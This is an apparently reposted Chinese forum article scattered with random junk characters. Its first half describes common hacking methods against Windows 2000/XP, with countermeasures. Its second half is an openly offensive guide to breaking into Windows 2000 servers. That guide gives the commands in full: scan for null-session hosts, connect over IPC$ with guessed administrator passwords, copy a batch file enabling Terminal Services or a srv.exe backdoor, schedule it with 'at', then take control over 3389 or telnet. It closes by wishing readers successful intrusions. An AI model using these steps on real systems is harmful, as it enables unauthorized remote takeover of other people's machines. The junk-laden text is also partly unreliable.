查看详细资料

孙子兵法上说，知己知彼，百战不殆。要想有效的防范黑客对我们电脑的入侵和破坏，仅仅被动的安装防火墙是显然不够的，我们更应该了解一些常见的黑客入侵手法，针对不同的方法采取不同的措施，做到有的放矢。 6 I1 s9 O, f; w& |# K. S
　　1木马入侵
5 j) A2 `( \4 ]" e0 i1 M% n% F8 L　　木马也许是广大电脑爱好者最深恶痛绝的东东了，相信不少朋友都受到过它的骚扰。木马有可能是黑客在已经获取我们操作系统可写权限的前提下，由黑客上传的(例如下面会提到的ipc$共享入侵)；也可能是我们浏览了一些垃圾个人站点而通过网页浏览感染的(利用了IE漏洞)；当然，最多的情况还是我们防范意识不强，随便运行了别人发来的所谓的mm图片、好看的动画之类的程序或者是在不正规的网站上随便下载软件使用。
- m& d) t& G) B6 ~% j　　应对措施：提高防范意识，不要随意运行别人发来的软件。安装木马查杀软件，及时更新木马特征库。推荐使用the cleaner，木马克星。 ( t. _4 F8 d& ?7 o. h: t6 c# B* t
　　2 ipc$共享入侵
+ H1 V! g; f1 U. W　　微软在win2000，xp中设置的这个功能对个人用户来说几乎毫无用处。反而成了黑客入侵nt架构操作系统的一条便利通道。如果你的操作系统存在不安全的口令，那就更可怕了。一条典型的入侵流程如下： 3 @, g4 M" U/ h0 x$ b# r% S
　　(1)用任何办法得到一个帐户与口令(猜测，破解)，网上流传有一个叫做smbcrack的软件就是利用ipc$来破解帐户口令的。如果你的密码位数不高，又很简单，是很容易被破解的。根据我的个人经验，相当多的人都将administrator的口令设为123，2003，或者干脆不设密码。
* D% `1 C+ H; ?" E; V- H　　(2)使用命令net use \xxx.xxx.xxx.xxx\ipc$“密码” /user:“用户名”建立一个有一定权限的ipc$连接。用copy trojan.exe \xxx.xxx.xxx.xxx\admin$ 将木马程序的服务器端复制到系统目录下。
$ H7 y, o: q* ^* d　　(3)用net time \xxx.xxx.xxx.xxx 命令查看对方操作系统的时间，然后用at \202.xxx.xxx.xxx 12：00 trojan.exe 让trojan.exe在指定时间运行。
$ x9 Y% O+ }0 `3 R　　这样一来，你的电脑就完全被黑客控制了。
, p% K" m; y3 v& D　　应对措施：禁用server服务, Task Scheduler服务，去掉网络文件和打印机共享前的对勾， 当然，给自己的帐户加上强壮的口令才是最关键的。
* n/ G$ u/ n. @　　3iis漏洞入侵
0 m6 h' ^, _  w) v　　由于宽带越来越普及，给自己的win2000或是xp装上简单易学的iis，搭建一个不定时开放的ftp或是web站点，相信是不少电脑爱好者所向往的，而且应该也已经有很多人这样做了。但是iis层出不穷的漏洞实在令人担心。远程攻击着只要使用webdavx3这个漏洞攻击程序和telnet命令就可以完成一次对iis的远程攻击，; k5 x# X2 O( o" e& d+ i8 y1 t: `
　　利用iis的webdav漏洞攻击成功后的界面
9 A1 l, L( E) i: Q. s　　这里的systen32就指的是对方机器的系统文件夹了，也就是说黑客此刻执行的任何命令，都是在被入侵的机器上运行的。这个时候如果执行format命令，危害就可想而知了，用net user命令添加帐户也是轻而易举的。
& q% {) F; x8 w  r3 b　　应对措施：关注微软官方站点，及时安装iis的漏洞补丁。 5 V% H1 c! }, h  r
　　4网页恶意代码入侵
0 j7 e. v- ~: R　　在我们浏览网页的时候不可避免的会遇到一些不正规的网站，它们经常会擅自修改浏览者的注册表，其直接体现便是修改IE的默认主页，锁定注册表，修改鼠标右键菜单等等。实际上绝大部分的网页恶意代码都是通过修改我们的注册表达到目的。只要保护好自己的注册表，就一切ok了。 - ]+ f6 g9 R, i- t4 K3 e( `
　　应对措施：安装具有注册表实时监控功能的防护软件，做好注册表的备份工作。禁用Remote Registry Service服务，不要上一些不该上的网站。这里我推荐大家使用hackereliminator这款防火墙。' G1 T& Y9 G4 ?. N  }+ \
最简单的win2000server入侵方法[原创]1 c. C8 o7 h# C/ w1 i
首先第一节伸展运动：下载小榕流光4.7扫描存在空连接(ipc)漏洞主机。然后我们再做扩展运动：选择登陆方式为3389  telnet
5 |. o5 M1 X* C$ t! T( B1  3389& J4 V5 d5 `) c7 |6 P; f
    在原地利用DOS  edit建立.bat后缀批处理文件（文件名自己定就可以了）
3 S" V# W8 e8 W( C
$ T" P- S4 F- o! x$ z% recho [Components] > c:\sql
0 f- }: l2 [! G6 uecho TSEnable = on >>
1 T  f  n! Y$ b, Tc:\sqlsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q6 p. ^8 i3 R- l! k4 b- p
net use \\扫描到的肉鸡IP\ipc$ 密码 /user:用户名（一般默认:administrator)
7 f' q( G( b( e利用at time 获取对方服务器时间。
' n" p; V$ C  S! l. B. S% _5 Ccopy 路径:\xxx.bat \\ip地址\$c:\winnt( g# K  ~, }0 ]
at time 00:00:00 xxx.bat/ P. K) k* @! z0 p7 C
服务器执行命令后，服务器将重新启动，利用3389登陆" l: g+ T$ Z; l  {
2  telne" b8 U7 ^6 R( y0 Q4 O1 Q) L
在流光早期版本中含有srv.exe2 Q1 h! D* q2 u9 V
net use \\扫描到的IP地址\ipc$ 密码 /user:用户名（一般默认:administrator)! g3 a" a2 N+ m
利用at time 获取对方服务器时间。% n) `* L8 n" K6 ?, _* W
copy 路径:\srv.exe \\ip地址\$c:\winnt' A* j/ W: @6 L
at time 00:00:00 srv.exe
3 u, F( Y# W" `0 ytelnet \\ip地址 端口（默认99）4 g. M6 \9 _/ y% e1 a4 \7 g
这个时候想做什么就做什么了！6 q; X5 R+ H# W0 X
预祝各位成功入侵！